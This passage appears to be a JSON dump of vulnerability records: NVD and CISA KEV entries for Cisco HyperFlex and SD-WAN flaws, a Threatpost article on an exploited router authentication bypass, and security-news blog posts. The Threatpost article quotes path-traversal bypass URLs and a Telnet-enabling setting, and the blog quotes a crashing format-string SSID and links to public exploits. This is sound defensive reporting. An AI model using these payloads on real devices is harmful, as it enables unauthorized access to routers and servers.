For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1505", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1505"], "modified": "2022-08-05T16:15:00", "cpe": [], "id": "CVE-2021-1505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1505", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T12:53:38", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. 
For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1508", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1508"], "modified": "2021-05-14T14:27:00", "cpe": [], "id": "CVE-2021-1508", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1508", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T12:53:24", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. 
For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1498", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498"], "modified": "2021-06-07T20:57:00", "cpe": ["cpe:/o:cisco:hyperflex_hx_data_platform:4.5\\(2a\\)"], "id": "CVE-2021-1498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1498", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.5\\(2a\\):*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-05T19:23:13", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. 
For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1468", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1468"], "modified": "2022-08-05T16:15:00", "cpe": [], "id": "CVE-2021-1468", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1468", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T12:53:23", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. 
For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1497", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497"], "modified": "2021-06-07T20:57:00", "cpe": ["cpe:/o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\)"], "id": "CVE-2021-1497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\):*:*:*:*:*:*:*"]}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1498", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1497", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-09T19:54:43", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. 
For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://<ip>/images/..%2findex.htm\n * http://<ip>/js/..%2findex.htm\n * http://<ip>/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. 
Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. 
\u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", 
"CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello, today I want to experiment with a new format. I will be reading last week's news from my [@avleonovnews](<https://t.me/avleonovnews>) channel, which I found the most interesting. I do this mostly for myself, but if you like it too, then that would be great. Please subscribe to [my YouTube channel](<https://www.youtube.com/channel/UCSenC-btyVAexgSwvVtxQkg>) and my Telegram [@avleonovcom](<https://t.me/avleonovcom>).\n\nLet's start with some new public exploits.\n\n 1. Researchers at Positive Technologies [have dropped a proof-of-concept (PoC) exploit](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>) on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA) CVE-2020-3580. This flaw was patched in October. There are reports of researchers pursuing bug bounties using this exploit. Maybe you should do this too. Well, or at least ask your IT administrators if they have updated the ASA.\n 2. [F5 BIG-IQ VE Post-auth Remote Root RCE](<https://vulners.com/packetstorm/PACKETSTORM:163264>). BIG-IQ provides a single point of management for all your BIG-IP devices \u2014 whether they are on premises or in a public or private cloud. It was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection. A good reason to check if you have this in the infrastructure. But of course the fact that this is Post-auth makes it less interesting.\n 3. 
[VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:163268>). From the description of the vulnerability that was published in February 2021. "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server." Therefore, if your IT colleagues have not patched vCenter since February, you can try to demonstrate how this vulnerability is exploited in practice.\n 4. [Solaris SunSSH 11.0 Remote Root](<https://vulners.com/packetstorm/PACKETSTORM:163232>). "CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6". If you are still using Solaris in your infrastructure, this is a great opportunity to try this exploit.\n 5. [Dlink DSL2750U - 'Reboot' Command Injection](<https://vulners.com/packetstorm/PACKETSTORM:163228>). There, in the exploit code, [there is a link to the full study](<https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20\\(firmware%20version%201.6\\)>) that shows how the researcher, Mohammed Hadi, gains admin access to the router. This is interesting considering that this router model is quite popular and you can still buy such a router.\n 6. [It's 2021 and a printf format string in a wireless network's name can break iPhone Wi-Fi](<https://www.theregister.com/2021/06/21/wifi_ssid_flaw/>). On Friday, Carl Schou, a security researcher in Denmark, reported that his iPhone lost its Wi-Fi capability after attempting to connect to a Wi-Fi network named "%p%s%s%s%s%n". Fortunately, the damage appears not to be permanent. 
Apple iOS devices that lose Wi-Fi capability after being bitten by this bug can be restored via the General -> Reset -> Reset Network Settings menu option, which reverts network settings to their factory default. Not a very interesting vulnerability in terms of practical exploitation, but fun. Don't connect to unfamiliar Wi-Fi networks.\n\nNow let's see some interesting new vulnerabilities.\n\n 1. [Critical Palo Alto Cyber-Defense Bug Allows Remote \u2018War Room\u2019 Access](<https://threatpost.com/critical-palo-alto-bug-remote-war-room/167169/>). "A critical security bug in Palo Alto Networks\u2019 Cortex XSOAR could allow remote attackers to run commands and automations in the Cortex XSOAR War Room and to take other actions on the platform, without having to log in. Found internally by Palo Alto, the bug (CVE-2021-3044) is an improper-authorization vulnerability that \u201cenables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API,\u201d according to the security vendor\u2019s Tuesday advisory.\n 2. [Cisco HyperFlex HX Auth Handling Remote Command Execution](<https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution>). Cisco HyperFlex HX Data Platform is a high-performance, extensible distributed file system that supports multiple hypervisors with a wide range of enterprise-grade data management and optimization services. If you have this in use, pay attention.\n 3. "VMware has rolled out security updates to resolve a [critical flaw affecting Carbon Black App Control](<https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html>) that could be exploited to bypass authentication and take control of vulnerable systems." Carbon Black Protection (Cb App Control), formerly Bit9, is an application control product that allows departments to monitor and control application execution on systems.\n 4. 
[NVIDIA Jetson Chipsets Found Vulnerable to High-severity Flaws](<https://thehackernews.com/2021/06/nvidia-jetson-chipsets-found-vulnerable.html>). The NVIDIA Jetson line consists of embedded Linux AI and computer vision compute modules and developer kits that primarily caters to AI-based computer vision applications and autonomous systems such as mobile robots and drones.\n 5. On June 22, SonicWall published an advisory (SNWLID-2021-0006) to address an [incomplete fix for a vulnerability in its operating system](<https://www.tenable.com/blog/cve-2021-20019-sonicwall-fixes-incomplete-patch-for-cve-2020-5135>), SonicOS, used in a variety of SonicWall network security devices, including their SSL VPNs.\n\nMalware:\n\n 1. Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called ["DarkRadiation"](<https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html>) that's implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications. "The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions," researchers from Trend Micro said in a report published last week. "The malware uses OpenSSL's AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram's API to send an infection status to the threat actor(s)."\n\nSome statistics for your presentations:\n\n 1. [ Time to patch increases significantly during pandemic](<https://www.computerweekly.com/news/252502887/Time-to-patch-increases-significantly-during-pandemic>). "Among some of the headline findings in the data was a sharp decrease in the frequency with which disclosed vulnerabilities are patched in under 24 hours \u2013 which dropped from 20% last year to 9.9% today \u2013 despite new vulnerabilities or zero-days being quickly exploited by malicious actors, as has been seen in many cases, even before disclosure. 
The survey also found that about 60% of organisations take more than 72 hours to patch, and more than 20% take over 30 days, giving malicious actors a wide-open window to take advantage of the disclosed vulnerabilities to get inside target networks, establish persistence, steal data, and drop malware or ransomware."\n 2. ['Set it and forget it' attitude to open-source software has become a major security problem, says Veracode](<https://www.theregister.com/2021/06/22/third_party_libraries_veracode/>). 92 per cent of the flaws discovered in third-party libraries could be fixed by simply updating to the latest version, with two-thirds of fixes being "minor and non-disruptive to the functionality of even the most complex software applications." The report also highlighted that a slim majority, 52 per cent, of developers claimed to have a formal process for the selection of third-party libraries, with a quarter saying they are either unsure or unaware of the existence of such a process, and that "security" is the third biggest concern when selecting a library \u2013 with "functionality" and "licensing" topping the leader board.\n\nPromising topic:\n\n 1. Google on Thursday [introduced a unified vulnerability schema for open source projects](<https://www.theregister.com/2021/06/24/google_security_fix/>), continuing its current campaign to shore up the security of open source software. A schema defines the structure of a database. It's a blueprint for the objects within the database and it informs how data can be queried and exchanged. As Google describes it, existing naming systems like the CPE Product Dictionary don't provide an easy way to automatically map a CVE vulnerability listing to a package name and a set of versions in a package manager. "With this schema we hope to define a format that all vulnerability databases can export." 
Well, let's keep an eye on this.\n\nWell, it would probably be worth ending with the words about John McAfee.\n\n[Anti-virus Pioneer John McAfee Found Dead in Spanish Prison Cell](<https://www.infosecurity-magazine.com/news/john-mcafee-found-dead-in-prison/>). I do not presume to say anything about the crimes of which he was accused. In any case, he was an information security legend and his whole life was cooler than any Hollywood blockbuster. I recommend watching videos on [his YouTube channel](<https://www.youtube.com/user/officialjohnmcafee>) about attack attribution and the current state of infrastructure security. He said some pretty unpopular things. And some of them are very interesting. The way it ended is of course very sad and tragic. RIP. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-28T10:59:53", "type": "avleonov", "title": "Last Week\u2019s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14871", "CVE-2020-3580", "CVE-2020-5135", "CVE-2021-1497", 
"CVE-2021-20019", "CVE-2021-3044"], "modified": "2021-06-28T10:59:53", "id": "AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9", "href": "http://feedproxy.google.com/~r/avleonov/~3/S3dBKHSK6BE/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-23T15:44:06", "description": "Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, [Joint cybersecurity advisory (CSA) AA22-279A](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>), and how I analyzed these vulnerabilities using my open source project [Vulristics](<https://github.com/leonov-av/vulristics>). \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239105>\n\nAmericans can't just release a list of "20 vulnerabilities most commonly exploited in attacks on American organizations." They like to add geopolitics and point the finger at some country. Therefore, I leave the attack attribution mentioned in the advisory title without comment.\n\nBut I like such lists of vulnerabilities for a number of reasons:\n\n * Such lists of **vulnerabilities** show which CVEs need to be addressed. This is the most obvious. If you notice vulnerabilities from the list in your infrastructure, start fixing them as soon as possible.\n * Such lists of vulnerabilities show the **software and hardware products** that are most important to monitor. This means that your vulnerability scanner must support this software very well. Make sure you can verify this.\n * Such lists of vulnerabilities show **groups of software and hardware products **that need to be monitored first. 
Usually these are products that are available to a wide range of users and are inconvenient to upgrade.\n * Such lists of vulnerabilities show **the types of vulnerabilities** that you need to pay attention to first.\n * Such lists of vulnerabilities are relatively compact and **can be easily analyzed** even manually.\n\nI can't help but notice that the quality of the advisory is not very high. For example, the description of vulnerabilities was automatically taken from NVD. Including this: \n\n"Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078". \n\nNot very informative, right? This joint advisory was released by three big serious organizations. They could work harder and write a unique text for each of the 20 CVEs. But no one seems to care.\n\nHere is a list of all vulnerabilities from the advisory:\n\n 1. Apache Log4j CVE-2021-44228 Remote Code Execution\n 2. Pulse Connect Secure CVE-2019-11510 Arbitrary File Read\n 3. GitLab CE/EE CVE-2021-22205 Remote Code Execution\n 4. Atlassian CVE-2022-26134 Remote Code Execution\n 5. Microsoft Exchange CVE-2021-26855 Remote Code Execution\n 6. F5 Big-IP CVE-2020-5902 Remote Code Execution\n 7. VMware vCenter Server CVE-2021-22005 Arbitrary File Upload\n 8. Citrix ADC CVE-2019-19781 Path Traversal\n 9. Cisco Hyperflex CVE-2021-1497 Command Line Execution\n 10. Buffalo WSR CVE-2021-20090 Relative Path Traversal\n 11. Atlassian Confluence Server and Data Center CVE-2021-26084 Remote Code Execution\n 12. Hikvision Webserver CVE-2021-36260 Command Injection\n 13. Sitecore XP CVE-2021-42237 Remote Code Execution\n 14. F5 Big-IP CVE-2022-1388 Remote Code Execution\n 15. Apache CVE-2022-24112 Authentication Bypass by Spoofing\n 16. ZOHO CVE-2021-40539 Remote Code Execution\n 17. Microsoft 